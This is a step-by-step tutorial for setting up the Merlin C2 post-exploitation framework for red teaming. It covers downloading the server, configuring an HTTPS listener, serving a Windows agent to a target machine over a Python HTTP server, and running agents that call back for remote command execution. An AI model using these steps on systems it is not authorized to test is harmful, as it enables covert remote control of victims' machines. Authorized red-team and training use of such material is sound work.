This guide provides a comprehensive, step-by-step methodology for downloading, installing, configuring, and using the Merlin C2 framework. Merlin is a lightweight, post-exploitation command and control framework written in Go. It is designed to be cross-platform, extensible, and easy to use for red teaming and penetration testing purposes.
By following this documentation, you will be able to:
- Set up and run the Merlin server.
- Configure listeners.
- Deploy agents on target machines.
- Interact with agents and execute commands.
Visit the official Merlin GitHub Releases Page to download the latest version of the framework.
Use the following wget command to download the server file:
wget https://github.com/Ne0nd0g/merlin/releases/download/v2.1.3/merlinServer-Linux-x64.7zAfter downloading, extract the file using the 7z tool:
7z x merlinServer-Linux-x64-v2.1.3.7zNote: The extracted files are password-protected. The default password for extraction is merlin.
Navigate to the folder where the server has been extracted and run the Merlin server:
./merlinServerOnce the server is running, open a new terminal window and navigate to the /data/bin directory to access the compiled Merlin CLI and agent files:
cd /data/binRun the Merlin CLI in the /data/bin directory:
./merlinCLIWith the CLI running, initiate the listeners using the listeners command:
listenersTo allow access from any device in the network, configure Merlin to listen on all interfaces:
- Use the
usecommand to select a protocol (e.g., HTTPS):
use HTTPS- Set the interface to
0.0.0.0:
set Interface 0.0.0.0- Set the port to
8443(or any other port of your choice):
set Port 8443- Verify the listener’s configuration:
show- Start the listener:
startOpen a new terminal window and run the Merlin agent with the default URL pointing to the server:
./merlinAgent -url http://127.0.0.1:443If the listener is configured on a global IP, replace 127.0.0.1 with your host IP.
-
Send the Windows agent to the target Windows machine.
-
Use a Python server to share the Windows agent:
python3 -m http.server {port}-
Access the server from the Windows browser and download the Windows Merlin agent.
-
Open Command Prompt (CMD) in the directory where the agent is downloaded and run:
.\windowsmerlinagentname -url https://ip_of_machine_where_server_is_running:port_noTo view all running agents, use the sessions command:
sessionsTo interact with a specific agent, use the interact command followed by the agent's ID:
interact agent_idAfter successfully interacting with the agent, type help to see a list of available commands that you can execute on the agent machine.
-
Cross-Platform Support: Merlin agents can run on Windows, Linux, and macOS.
-
Extensible Architecture: Merlin supports custom modules and extensions.
-
Encrypted Communication: All communication between the server and agents is encrypted using TLS.
-
Lightweight: The framework is designed to be minimal and efficient.
-
Red Teaming: Simulate advanced persistent threats (APTs) in a controlled environment.
-
Penetration Testing: Test the security posture of an organization.
-
Incident Response Training: Train security teams to detect and respond to C2 frameworks.
-
Always use Merlin in a legal and authorized environment.
-
Regularly update to the latest version to benefit from new features and security patches.
-
Use strong passwords and encryption for sensitive operations.
This guide provides a clear and structured approach for setting up and using the Merlin C2 framework. By following these steps, you can effectively deploy and manage Merlin agents for post-exploitation activities. Ensure that you follow each step carefully and verify your setup at each stage to avoid any issues.
For more information, visit the official Merlin GitHub Repository.